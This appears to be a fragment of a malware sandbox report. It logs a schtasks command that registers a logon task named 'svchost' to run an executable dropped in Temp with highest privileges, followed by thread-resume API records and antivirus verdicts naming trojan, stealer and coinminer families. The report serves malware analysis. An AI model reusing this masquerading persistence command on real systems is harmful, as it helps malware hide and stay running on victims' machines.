current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
filepath_r: C:\Windows\system32\schtasks.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000064
1 1 0

NtResumeThread

 thread_handle: 0x00000000000000c4
suspend_count: 1
process_identifier: 812
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000134
suspend_count: 1
process_identifier: 812
1 0 0

NtResumeThread

 thread_handle: 0x00000000000001b0
suspend_count: 1
process_identifier: 812
1 0 0

NtResumeThread

 thread_handle: 0x00000000000001e0
suspend_count: 1
process_identifier: 872
1 0 0

NtResumeThread

 thread_handle: 0x00000000000001e8
suspend_count: 1
process_identifier: 872
1 0 0

NtResumeThread

 thread_handle: 0x00000000000001ec
suspend_count: 1
process_identifier: 872
1 0 0

NtResumeThread

 thread_handle: 0x00000000000001f0
suspend_count: 1
process_identifier: 872
1 0 0
Elastic malicious (high confidence)
DrWeb Trojan.PackedNET.943
MicroWorld-eScan Gen:Variant.Ursu.411696
FireEye Generic.mg.4197eeb783ac6250
ALYac Gen:Variant.Ursu.411696
Cylance Unsafe
Sangfor Trojan.Win32.Save.a
Alibaba TrojanDropper:Win32/dropper.ali1003001
CrowdStrike win/malicious_confidence_90% (W)
Symantec Trojan.Gen.MBT
ESET-NOD32 a variant of MSIL/Kryptik.ACHI
APEX Malicious
Paloalto generic.ml
ClamAV Win.Packed.Bulz-9884610-0
Kaspersky HEUR:Trojan.MSIL.Cryptos.gen
BitDefender Gen:Variant.Ursu.411696
Avast Win64:CoinminerX-gen [Trj]
Ad-Aware Gen:Variant.Ursu.411696
Emsisoft Gen:Variant.Ursu.411696 (B)
TrendMicro TROJ_GEN.R002C0DHE21
McAfee-GW-Edition Trojan-FTUW!4197EEB783AC
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious PE
Avira HEUR/AGEN.1143066
MAX malware (ai score=100)
Kingsoft Win32.Troj.Undef.(kcloud)
Microsoft Trojan:MSIL/AgentTesla.CHH!MTB
GData Gen:Variant.Ursu.411696
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.Generic.C4462767
McAfee Artemis!4197EEB783AC
VBA32 CIL.StupidStealth.Heur
TrendMicro-HouseCall TROJ_GEN.R002C0DHE21
Tencent Msil.Trojan.Cryptos.Pbpf
Ikarus Win32.Outbreak
eGambit Unsafe.AI_Score_99%
Fortinet MSIL/GenKryptik.FHLO!tr
MaxSecure Trojan.Malware.300983.susgen
AVG Win64:CoinminerX-gen [Trj]
Cybereason malicious.783ac6
Qihoo-360 Win64/Miner.Coinminer.HgEASaUA